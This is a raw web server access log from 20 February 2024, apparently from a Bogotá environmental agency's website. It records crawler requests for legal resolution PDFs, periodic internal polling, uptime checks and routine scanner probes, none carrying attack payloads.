201.245.192.253 - - [20/Feb/2024:01:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36739
201.245.192.253 - - [20/Feb/2024:01:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39119
201.245.192.253 - - [20/Feb/2024:01:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
201.245.192.253 - - [20/Feb/2024:01:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
216.244.66.195 - - [20/Feb/2024:01:20:57 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [20/Feb/2024:01:21:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:01:21:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:01:22:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57476
216.245.221.92 - - [20/Feb/2024:01:26:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:01:27:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Feb/2024:01:29:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36739
201.245.192.253 - - [20/Feb/2024:01:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39119
201.245.192.253 - - [20/Feb/2024:01:29:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
201.245.192.253 - - [20/Feb/2024:01:29:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
172.22.2.4 - - [20/Feb/2024:01:28:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.19 - - [20/Feb/2024:01:30:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1329.pdf HTTP/1.1" 200 464683
164.52.0.94 - - [20/Feb/2024:01:30:38 -0500] "\x16\x03\x01\x02" 400 226
152.61.128.50 - - [20/Feb/2024:01:30:40 -0500] "GET / HTTP/1.1" 200 319
164.52.0.94 - - [20/Feb/2024:01:31:02 -0500] "GET / HTTP/1.1" 200 319
164.52.0.94 - - [20/Feb/2024:01:31:05 -0500] "GET / HTTP/1.1" 200 319
164.52.0.94 - - [20/Feb/2024:01:31:08 -0500] "\x16\x03\x01\x02" 400 226
216.245.221.92 - - [20/Feb/2024:01:31:31 -0500] "HEAD / HTTP/1.1" 200 -
164.52.0.94 - - [20/Feb/2024:01:31:38 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.66.21 - - [20/Feb/2024:01:33:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1341.pdf HTTP/1.1" 200 511422
172.22.2.4 - - [20/Feb/2024:01:33:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.167 - - [20/Feb/2024:01:35:20 -0500] "GET /portaldeninos/2019/08/05/ruido/ HTTP/1.1" 200 92818
66.249.66.167 - - [20/Feb/2024:01:35:36 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
66.249.66.165 - - [20/Feb/2024:01:35:37 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
66.249.66.167 - - [20/Feb/2024:01:35:38 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
66.249.66.165 - - [20/Feb/2024:01:35:38 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
66.249.66.167 - - [20/Feb/2024:01:35:39 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
66.249.66.167 - - [20/Feb/2024:01:35:40 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
66.249.66.19 - - [20/Feb/2024:01:35:46 -0500] "GET /BLA/resoluciones/Autos%202008/2188.pdf HTTP/1.1" 200 83127
172.22.2.4 - - [20/Feb/2024:01:34:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57880
216.245.221.92 - - [20/Feb/2024:01:36:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.235 - - [20/Feb/2024:01:35:34 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61904
205.210.31.224 - - [20/Feb/2024:01:37:30 -0500] "GET / HTTP/1.1" 200 319
66.249.66.167 - - [20/Feb/2024:01:38:15 -0500] "GET /portaldeninos/2021/06/01/agroecologia-tips-para-germinar-semillas-en-casa/ HTTP/1.1" 200 105801
66.249.66.20 - - [20/Feb/2024:01:38:27 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-140.pdf HTTP/1.1" 200 1042112
66.249.66.21 - - [20/Feb/2024:01:38:28 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-90.pdf HTTP/1.1" 200 1176680
66.249.66.21 - - [20/Feb/2024:01:38:28 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-72.pdf HTTP/1.1" 200 343776
66.249.66.20 - - [20/Feb/2024:01:38:29 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-131.pdf HTTP/1.1" 200 716465
66.249.66.20 - - [20/Feb/2024:01:38:29 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-60.pdf HTTP/1.1" 200 855263
66.249.66.21 - - [20/Feb/2024:01:38:30 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-41.pdf HTTP/1.1" 200 313556
66.249.66.21 - - [20/Feb/2024:01:38:31 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-80.pdf HTTP/1.1" 200 687908
201.245.192.253 - - [20/Feb/2024:01:39:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36739
201.245.192.253 - - [20/Feb/2024:01:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39119
201.245.192.253 - - [20/Feb/2024:01:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
185.224.128.55 - - [20/Feb/2024:01:39:45 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Feb/2024:01:39:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35706
17.241.219.29 - - [20/Feb/2024:01:40:09 -0500] "GET /pagos-por-servicios-ambientales-y-acuerdos-de-conservacion-estrategias-para-proteger-areas-de-importancia-ambiental.html HTTP/1.1" 200 893
172.22.2.4 - - [20/Feb/2024:01:39:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:01:41:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:01:40:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61084
172.22.2.4 - - [20/Feb/2024:01:43:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63095
66.249.66.20 - - [20/Feb/2024:01:45:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2554.pdf HTTP/1.1" 200 539503
172.22.2.4 - - [20/Feb/2024:01:45:47 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [20/Feb/2024:01:45:51 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [20/Feb/2024:01:45:56 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [20/Feb/2024:01:45:57 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [20/Feb/2024:01:45:57 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
216.245.221.92 - - [20/Feb/2024:01:46:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.59 - - [20/Feb/2024:01:46:31 -0500] "GET /portaldeninos/?s=2023 HTTP/1.1" 200 87105
172.22.2.4 - - [20/Feb/2024:01:45:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Feb/2024:01:46:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/2017.pdf HTTP/1.1" 200 472121
216.244.66.195 - - [20/Feb/2024:01:47:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/3515.pdf HTTP/1.1" 200 448875
172.22.2.4 - - [20/Feb/2024:01:45:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
40.77.167.1 - - [20/Feb/2024:01:48:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2873.pdf HTTP/1.1" 200 522399
66.249.66.21 - - [20/Feb/2024:01:48:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0518.pdf HTTP/1.1" 200 687426
172.22.2.4 - - [20/Feb/2024:01:48:51 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
172.22.2.4 - - [20/Feb/2024:01:48:52 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
66.249.66.20 - - [20/Feb/2024:01:49:00 -0500] "GET /Publicaciones/2024EE32209.pdf HTTP/1.1" 200 231872
17.241.227.230 - - [20/Feb/2024:01:49:59 -0500] "GET /agendate-con-la-feria-ambiental-de-servicios-a-la-ciudadania-2023.html HTTP/1.1" 200 743
216.245.221.92 - - [20/Feb/2024:01:51:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:01:50:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:01:50:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [20/Feb/2024:01:53:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/1485.pdf HTTP/1.1" 200 298366
172.22.2.4 - - [20/Feb/2024:01:51:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
40.77.167.235 - - [20/Feb/2024:01:53:35 -0500] "GET /BLA/resoluciones/AUTOS%202022/6069.pdf HTTP/1.1" 200 378615
35.203.211.63 - - [20/Feb/2024:01:55:47 -0500] "GET / HTTP/1.1" 200 319
66.249.66.19 - - [20/Feb/2024:01:56:20 -0500] "GET /BLA/resoluciones/AUTOS%202007/3358.pdf HTTP/1.1" 200 116981
216.245.221.92 - - [20/Feb/2024:01:56:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.32 - - [20/Feb/2024:01:58:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0218.pdf HTTP/1.1" 304 -
172.22.2.4 - - [20/Feb/2024:01:56:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [20/Feb/2024:01:58:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7034.pdf HTTP/1.1" 200 1311550
40.77.190.242 - - [20/Feb/2024:01:58:37 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [20/Feb/2024:01:57:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54291
66.249.66.21 - - [20/Feb/2024:02:00:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3818.pdf HTTP/1.1" 200 483750
216.245.221.92 - - [20/Feb/2024:02:01:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.181 - - [20/Feb/2024:02:03:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2405.pdf HTTP/1.1" 200 486694
172.22.2.4 - - [20/Feb/2024:02:02:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:03:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.38 - - [20/Feb/2024:02:05:20 -0500] "GET /serpiente-sabanera-pone-huevos-en-area-protegida-de-bogota.html HTTP/1.1" 200 670
216.245.221.92 - - [20/Feb/2024:02:06:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [20/Feb/2024:02:07:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0728.pdf HTTP/1.1" 200 335316
52.167.144.138 - - [20/Feb/2024:02:07:31 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
216.244.66.195 - - [20/Feb/2024:02:09:22 -0500] "GET /robots.txt HTTP/1.1" 404 1018
162.55.175.143 - - [20/Feb/2024:02:09:38 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.20 - - [20/Feb/2024:02:08:25 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 46036
66.249.66.19 - - [20/Feb/2024:02:10:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5099.pdf HTTP/1.1" 200 488257
172.22.2.4 - - [20/Feb/2024:02:08:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:09:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54904
216.245.221.92 - - [20/Feb/2024:02:11:31 -0500] "HEAD / HTTP/1.1" 200 -
103.179.25.106 - - [20/Feb/2024:02:15:53 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [20/Feb/2024:02:14:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:02:16:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:15:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
201.245.192.253 - - [20/Feb/2024:02:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37700
201.245.192.253 - - [20/Feb/2024:02:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39109
201.245.192.253 - - [20/Feb/2024:02:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
201.245.192.253 - - [20/Feb/2024:02:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
216.245.221.92 - - [20/Feb/2024:02:21:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:20:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.189.7 - - [20/Feb/2024:02:22:16 -0500] "GET /images/25%20Incendio%20declaratoria.jpeg HTTP/1.1" 200 90327
69.63.189.4 - - [20/Feb/2024:02:22:16 -0500] "GET /images/Rueda%20de%20prensa.jpeg HTTP/1.1" 200 58715
69.63.189.117 - - [20/Feb/2024:02:22:16 -0500] "GET /images/30%20de%20enero%20Entrenubes%20alcalde.jpeg HTTP/1.1" 200 64486
69.63.189.5 - - [20/Feb/2024:02:22:16 -0500] "GET /images/31%20de%20enero%20humedal%20La%20Conejera.jpg HTTP/1.1" 200 33808
69.63.189.9 - - [20/Feb/2024:02:22:22 -0500] "GET /images/24%20de%20enero%20sendero.JPG HTTP/1.1" 200 59121
69.63.189.9 - - [20/Feb/2024:02:22:23 -0500] "GET /images/Comprimida%20incendios.jpg HTTP/1.1" 200 23316
172.22.2.4 - - [20/Feb/2024:02:20:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
66.249.66.166 - - [20/Feb/2024:02:23:15 -0500] "GET /portaldeninos/2021/06/20/mas-de-130-arboles-fueron-plantados-en-el-humedal-la-conejera-con-comunidad-educativa/ HTTP/1.1" 200 107808
172.22.2.4 - - [20/Feb/2024:02:25:26 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [20/Feb/2024:02:25:28 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [20/Feb/2024:02:25:29 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [20/Feb/2024:02:25:29 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [20/Feb/2024:02:25:29 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
216.245.221.92 - - [20/Feb/2024:02:26:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.2 - - [20/Feb/2024:02:27:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/0737.pdf HTTP/1.1" 200 311952
172.22.2.4 - - [20/Feb/2024:02:25:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:26:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
152.61.128.50 - - [20/Feb/2024:02:29:03 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [20/Feb/2024:02:29:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [20/Feb/2024:02:29:05 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [20/Feb/2024:02:29:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37700
201.245.192.253 - - [20/Feb/2024:02:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39109
201.245.192.253 - - [20/Feb/2024:02:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
201.245.192.253 - - [20/Feb/2024:02:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
216.245.221.92 - - [20/Feb/2024:02:31:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:31:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:32:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.244.66.195 - - [20/Feb/2024:02:34:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/2195.pdf HTTP/1.1" 200 452673
216.244.66.195 - - [20/Feb/2024:02:35:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/3074.pdf HTTP/1.1" 200 408526
216.244.66.195 - - [20/Feb/2024:02:36:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/3283.pdf HTTP/1.1" 200 374573
216.245.221.92 - - [20/Feb/2024:02:36:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.28 - - [20/Feb/2024:02:38:51 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7588
172.22.2.4 - - [20/Feb/2024:02:37:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Feb/2024:02:39:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37700
201.245.192.253 - - [20/Feb/2024:02:39:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39109
201.245.192.253 - - [20/Feb/2024:02:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
201.245.192.253 - - [20/Feb/2024:02:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35709
172.22.2.4 - - [20/Feb/2024:02:38:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [20/Feb/2024:02:41:31 -0500] "HEAD / HTTP/1.1" 200 -
114.119.135.199 - - [20/Feb/2024:02:41:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2015/&sort=name&order=asc HTTP/1.1" 200 14312
40.77.167.143 - - [20/Feb/2024:02:44:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2963.pdf HTTP/1.1" 200 603266
172.22.2.4 - - [20/Feb/2024:02:43:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:44:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61084
52.167.144.230 - - [20/Feb/2024:02:46:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 140793
216.245.221.92 - - [20/Feb/2024:02:46:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.171 - - [20/Feb/2024:02:47:34 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os2.jpg HTTP/1.1" 404 75240
34.76.96.55 - - [20/Feb/2024:02:48:06 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [20/Feb/2024:02:49:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:02:51:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.182 - - [20/Feb/2024:02:51:36 -0500] "GET /secretaria-de-ambiente-invita-a-proteger-la-culebra-sabanera.html HTTP/1.1" 200 924
172.22.2.4 - - [20/Feb/2024:02:50:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
40.77.167.54 - - [20/Feb/2024:02:53:14 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
216.245.221.92 - - [20/Feb/2024:02:56:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:55:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:02:56:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [20/Feb/2024:02:57:16 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1037
172.22.2.4 - - [20/Feb/2024:02:57:21 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1043
172.22.2.4 - - [20/Feb/2024:02:57:37 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [20/Feb/2024:02:55:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44728
172.22.2.4 - - [20/Feb/2024:02:57:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.244.66.195 - - [20/Feb/2024:02:58:07 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [20/Feb/2024:02:57:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:02:56:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:02:57:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:02:57:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:02:56:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [20/Feb/2024:03:01:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:00:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:01:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [20/Feb/2024:03:06:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [20/Feb/2024:03:07:16 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202019/1898.pdf HTTP/1.1" 200 266322
52.167.144.23 - - [20/Feb/2024:03:06:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53809
66.249.66.167 - - [20/Feb/2024:03:08:15 -0500] "GET /portaldeninos/aulas-ambientales/ HTTP/1.1" 200 88416
172.22.2.4 - - [20/Feb/2024:03:06:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.23 - - [20/Feb/2024:03:09:06 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FREGISTROS+2021%2F HTTP/1.1" 200 23530
172.22.2.4 - - [20/Feb/2024:03:07:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
52.167.144.180 - - [20/Feb/2024:03:09:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/5904.pdf HTTP/1.1" 304 -
172.22.2.4 - - [20/Feb/2024:03:09:58 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
216.245.221.92 - - [20/Feb/2024:03:11:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:12:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:13:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.245.221.92 - - [20/Feb/2024:03:16:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Feb/2024:03:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37696
201.245.192.253 - - [20/Feb/2024:03:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38969
201.245.192.253 - - [20/Feb/2024:03:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
201.245.192.253 - - [20/Feb/2024:03:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
172.22.2.4 - - [20/Feb/2024:03:18:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.165 - - [20/Feb/2024:03:20:16 -0500] "GET /portaldeninos/2021/01/14/en-caso-de-encontrarte-una-tingua-azul-sigue-las-siguientes-recomendaciones/ HTTP/1.1" 200 102470
172.22.2.4 - - [20/Feb/2024:03:19:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [20/Feb/2024:03:21:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:24:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [20/Feb/2024:03:24:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:03:26:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Feb/2024:03:26:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/2497.pdf HTTP/1.1" 200 413357
172.22.2.4 - - [20/Feb/2024:03:25:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58711
186.31.19.117 - - [20/Feb/2024:03:26:52 -0500] "GET /desde-el-paramo-mas-grande-del-mundo-sumapaz-bogota-se-alista-para-ser-sede-de-la-cop16.html HTTP/1.1" 200 981
216.244.66.195 - - [20/Feb/2024:03:27:33 -0500] "GET /BLA/resoluciones/AUTOS%202023/2724.pdf HTTP/1.1" 200 433908
201.245.192.253 - - [20/Feb/2024:03:29:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37696
201.245.192.253 - - [20/Feb/2024:03:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38969
201.245.192.253 - - [20/Feb/2024:03:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
201.245.192.253 - - [20/Feb/2024:03:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
216.245.221.92 - - [20/Feb/2024:03:31:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:30:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:30:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [20/Feb/2024:03:36:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:35:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
167.248.133.49 - - [20/Feb/2024:03:38:17 -0500] "GET /portaldeninos HTTP/1.1" 404 1035
